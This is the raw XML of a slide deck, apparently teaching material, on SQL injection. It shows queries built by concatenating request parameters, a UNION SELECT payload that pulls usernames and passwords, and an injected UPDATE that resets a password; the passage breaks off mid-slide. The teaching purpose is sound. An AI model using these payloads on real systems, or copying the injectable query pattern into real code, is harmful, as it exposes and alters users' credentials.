            <a:ext cx="6674168" cy="6309266"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="548640"/>
            <a:ext cx="13612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1992:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123511273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5351"/>
            <a:ext cx="10515600" cy="1004667"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL Injection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63216"/>
            <a:ext cx="10515600" cy="5589432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> name, description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> items </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘id’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) + “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="35A327"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Result after injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> name, description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> items </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'12'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UNION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> username, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="77A09F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>--';</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>” +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘pw’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+ “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>req.args.get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘user’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>) +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="127000" dist="19050" dir="16200000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="0"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="77A09F"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="4572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endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef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lang="en-US" sz="2400" b="1" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Result after injection:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="4572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lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> '12345'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
